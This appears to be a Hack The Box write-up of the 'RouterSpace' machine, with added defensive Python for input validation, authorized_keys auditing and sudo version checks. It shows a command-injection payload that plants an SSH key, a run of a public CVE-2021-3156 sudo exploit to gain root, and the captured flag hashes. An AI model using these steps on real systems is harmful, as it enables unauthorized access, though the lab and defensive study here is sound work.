USER
Step 1
nmap:
┌──(void㉿void)-[/htb/routerspace]
└─$ nmap -p- 10.10.11.148
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
┌──(void㉿void)-[/htb/routerspace]
└─$ nmap -p22,80 -sCV 10.10.11.148
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-28 09:22 CEST
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-77288
| Content-Type: text/html; charset=utf-8
| Content-Length: 70
| ETag: W/"46-abbFyEBeXh9CSfIO4E5mGzrEQI0"
| Date: Mon, 28 Mar 2022 07:24:55 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: zLw qUksX fN OW A }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-62862
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Mon, 28 Mar 2022 07:24:54 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-79870
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Mon, 28 Mar 2022 07:24:54 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
dirb:
N/A
nikto:
+ Uncommon header 'x-cdn' found, with contents: RouterSpace-66427
ffuf:
$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.148/FUZZ -fs 50-95
css [Status: 301, Size: 173, Words: 7, Lines: 11]
fonts [Status: 301, Size: 177, Words: 7, Lines: 11]
img [Status: 301, Size: 173, Words: 7, Lines: 11]
js [Status: 301, Size: 171, Words: 7, Lines: 11]
$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.148/FUZZ.html -fs 50-95
contact [Status: 200, Size: 46439, Words: 10270, Lines: 358]
Step 2
Visit the website and we find multiple download buttons, all leading to RouterSpace.apk. Before we analyze the binary, we look at contact.html; from there we find features.html and Pricing.html, both of which give some strange output.
$ curl -v http://10.10.11.148/features.html
> GET /features.html HTTP/1.1
> Host: 10.10.11.148
< HTTP/1.1 200 OK
< X-Powered-By: RouterSpace
< X-Cdn: RouterSpace-65007
<
Suspicious activity detected !!! {RequestID: Z 73Mv z F F i }
┌──(void㉿void)-[/htb/routerspace]
└─$ curl -v http://10.10.11.148/Pricing.html
> GET /Pricing.html HTTP/1.1
> Host: 10.10.11.148
< HTTP/1.1 200 OK
< X-Powered-By: RouterSpace
< X-Cdn: RouterSpace-85902
<
Suspicious activity detected !!! {RequestID: l2 Pmi K lhy9 vL C yj6a }
Unzip the .apk file and start analyzing the data. We find a hostname in apk-unpack/META-INF/CERT.RSA:
- routerspace.htb
Nothing more of value at first glance. As this is an easy box we should probably look for something obvious, like a public key for the SSH service, some API call or similar. Analyzing the data further with jd-gui and MobSF doesn't give anything of value either.
Change approach and try to emulate the apk using Anbox and adb:
Install the kernel modules (only needed if "ls -1 /dev/{ashmem,binder}" reports that they are not found):
$ apt install dkms linux-headers-amd64
$ git clone https://github.com/anbox/anbox-modules.git
$ sudo ./INSTALL.sh
$ sudo modprobe ashmem_linux && sudo modprobe binder_linux
$ ls -1 /dev/{ashmem,binder}
$ sudo apt install snapd
$ service snapd start
$ sudo snap install --devmode --beta anbox
$ sudo apt install android-tools-adb
$ adb devices
* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
$ anbox launch --package=org.anbox.appmgr
$ adb devices
List of devices attached
emulator-5558 device
$ adb install RouterSpace.apk
Performing Streamed Install
Success
$ anbox.appmgr
If you are not able to enable the proxy, kill all adb and anbox services and try again.
$ kill ...
$ adb devices
$ adb shell settings put global http_proxy 192.168.101.187:8181
$ anbox.appmgr
Burp Proxy Settings:
We are now able to capture the Check Status API call in Burp.
Step 3
We have one data parameter to play with, ip, and we quickly find that it is not sanitized and is vulnerable to command injection. Generate a new SSH key, inject it and log in as user Paul. Grab user.txt.
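As an added example (not code from the RouterSpace app, whose server side is not on the page), here is the shape of this bug and its fix in Python. The handler is assumed to pass the ip value to ping: the vulnerable variant builds a shell command string, the hardened one allowlists a literal IP address with the ipaddress module and passes an argv list so no shell ever interprets the value. A metacharacter blocklist, like the "Suspicious activity detected" filter the app answers with, is a weaker control than that allowlist; looks_like_injection is included only as a detection aid for request logs. All names and sample inputs are constructed.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters, used only to flag requests for logging/alerting,
# never as the input validation itself.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")


def build_vulnerable_command(ip: str) -> str:
    """Assumed vulnerable shape: the ip value is concatenated into a shell
    command line. Executed with shell=True, ';' or '|' in ip become shell syntax."""
    return "ping -c 1 " + ip


def is_valid_ip(value: str) -> bool:
    """Allowlist check: accept only a literal IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_hardened_command(ip: str) -> list:
    """Validate first, then build an argv list. No shell sees the value, and
    because it must parse as an address it cannot start with '-' either."""
    if not is_valid_ip(ip):
        raise ValueError("ip must be a literal IPv4 or IPv6 address")
    return ["ping", "-c", "1", ip]


def looks_like_injection(value: str) -> bool:
    """Detection aid: True if the request value carries shell metacharacters."""
    return SHELL_META.search(value) is not None


def check_status(ip: str, timeout: float = 5.0) -> bool:
    """Hardened handler: True if one ping succeeds, False on invalid input."""
    try:
        argv = build_hardened_command(ip)
    except ValueError:
        return False
    result = subprocess.run(argv, capture_output=True, timeout=timeout)
    return result.returncode == 0


if __name__ == "__main__":
    # Constructed sample inputs; the second models the kind of value an
    # attacker would send to the unsanitized parameter.
    for sample in ["10.10.11.148", "10.10.11.148; id"]:
        print(sample, "valid:", is_valid_ip(sample), "flagged:", looks_like_injection(sample))
```

The argv form fixes the bug on its own; the allowlist is still worth keeping because it rejects the request before anything is executed and gives the log a clean signal.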
┌──(void㉿void)-[/htb/routerspace]
└─$ ssh-keygen -t rsa -b 4096 -f paul-id_rsa
┌──(void㉿void)-[/htb/routerspace]
└─$ cat paul-id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC [... snip ...]
Inject the payload in Burp Repeater:
mkdir -p /home/paul/.ssh && echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC [... snip ...]' > /home/paul/.ssh/authorized_keys
┌──(void㉿void)-[/htb/routerspace]
└─$ ssh paul@routerspace.htb -i paul-id_rsa
paul@routerspace:~$ id && cat user.txt
uid=1001(paul) gid=1001(paul) groups=1001(paul)
e8f2d33e776f9e917eeab833f5dff7a6
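The payload above only works because the web service runs with paul's privileges and can write into paul's own ~/.ssh; a dedicated low-privilege service account would have stopped it. As an added detection example (not part of the writeup), here is a small Python audit that parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints and reports entries missing from a known baseline. The file content and the key blobs are constructed placeholders, not real keys.

```python
import base64
import hashlib

# Constructed sample file: the first entry is the known baseline key, the
# second models a key added through the web service. Blobs are just base64
# of placeholder text, not real keys; the audit never parses key structure.
SAMPLE_AUTHORIZED_KEYS = """\
# ~/.ssh/authorized_keys (constructed)
ssh-rsa Y29uc3RydWN0ZWQtYmFzZWxpbmUta2V5 paul@workstation

ssh-rsa Y29uc3RydWN0ZWQtaW5qZWN0ZWQta2V5 void@void
"""

BASELINE_BLOBS = {"Y29uc3RydWN0ZWQtYmFzZWxpbmUta2V5"}

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def parse_authorized_keys(content):
    """Yield (options, keytype, blob, comment) for each key line.
    A line whose first token is a key type has no options field; otherwise the
    first token is the options string (quoted options with spaces are not handled)."""
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split(None, 1)
        if tokens[0].startswith(KEY_TYPES):
            options, rest = "", line
        else:
            options, rest = tokens[0], (tokens[1] if len(tokens) > 1 else "")
        parts = rest.split(None, 2)      # keytype, blob, optional comment
        if len(parts) < 2:
            continue                     # malformed line, skip it
        keytype, blob = parts[0], parts[1]
        comment = parts[2] if len(parts) == 3 else ""
        yield options, keytype, blob, comment


def fingerprint(blob):
    """OpenSSH-style fingerprint: base64 of SHA256 over the decoded blob, no padding."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def find_unexpected_keys(content, baseline_blobs):
    """Return every entry whose key blob is not in the baseline allowlist."""
    return [
        {"options": opts, "type": kt, "fingerprint": fingerprint(blob), "comment": comment}
        for opts, kt, blob, comment in parse_authorized_keys(content)
        if blob not in baseline_blobs
    ]


if __name__ == "__main__":
    for entry in find_unexpected_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE_BLOBS):
        print("unexpected key:", entry)
```

In practice the baseline comes from configuration management and the audit runs on a schedule or from a file-integrity monitor; a comparison of the file's mtime against the last approved change is a cheap first signal before the fingerprints are compared.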
ROOT
Step 1
With some quick manual enumeration we find that the sudo version is old and vulnerable to CVE-2021-3156.
paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
paul@routerspace:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
author: "0xPThree"
Description: Ubuntu 20.04.3 LTS
Release: 20.04
Codename: focal
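As an added example from the vulnerability-management side (not part of the writeup), here is a Python checker that parses a `sudo --version` banner and compares it against the affected upstream ranges published for CVE-2021-3156 (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). The first sample banner is the one shown above; the other two are constructed.

```python
import re

# Affected upstream ranges from the CVE-2021-3156 (Baron Samedit) advisory,
# as inclusive (low, high) tuples of (major, minor, patch, plevel).
AFFECTED_RANGES = [((1, 8, 2, 0), (1, 8, 31, 2)), ((1, 9, 0, 0), (1, 9, 5, 1))]

VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?", re.M)


def parse_sudo_version(text):
    """Parse the 'Sudo version X.Y[.Z][pN]' line of `sudo --version` output
    into a comparable tuple (major, minor, patch, plevel)."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no 'Sudo version' line in input")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch or 0), int(plevel or 0))


def is_vulnerable_to_cve_2021_3156(version):
    """True if the upstream version falls inside an affected range."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def assess(text):
    """Return 'vulnerable', 'not-vulnerable' or 'unknown' for a version banner."""
    try:
        version = parse_sudo_version(text)
    except ValueError:
        return "unknown"
    return "vulnerable" if is_vulnerable_to_cve_2021_3156(version) else "not-vulnerable"


# First banner is the box output shown in the writeup; the others are constructed.
SAMPLES = {
    "routerspace": "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
    "patched": "Sudo version 1.9.5p2\n",
    "ancient": "Sudo version 1.8.1\n",
}

if __name__ == "__main__":
    for name, banner in SAMPLES.items():
        print(f"{name}: {assess(banner)}")
```

One caveat for real fleets: Debian and Ubuntu backport security fixes without bumping the upstream version, so a fully updated focal host still reports 1.8.31 and this check alone gives a false positive. Confirm with the package changelog (`apt changelog sudo`) or with the distribution's security notice before treating a host as exposed.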
┌──(void㉿void)-[/htb/routerspace]
└─$ scp -i paul-id_rsa -rp sudo-exploit-main paul@routerspace.htb:/dev/shm
sice.c 100% 176 5.5KB/s 00:00
README.md 100% 234 7.6KB/s 00:00
Makefile 100% 95 3.0KB/s 00:00
exploit.c 100% 2651 82.9KB/s 00:00
paul@routerspace:/dev/shm/sudo-exploit-main$ make
gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:75:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
75 | execve(argv[0], argv, env);
| ^~~~~~
mkdir libnss_X
gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2
paul@routerspace:/dev/shm/sudo-exploit-main$ ./exploit
root@routerspace:/dev/shm/sudo-exploit-main# id && cat /root/root.txt
uid=0(root) gid=1001(paul) groups=1001(paul)
3d6de1c1362a1d59bd130fd45d895e45
References
Install Anbox: https://docs.anbox.io/userguide/install_kernel_modules.html
CVE-2021-3156: https://github.com/redhawkeye/sudo-exploit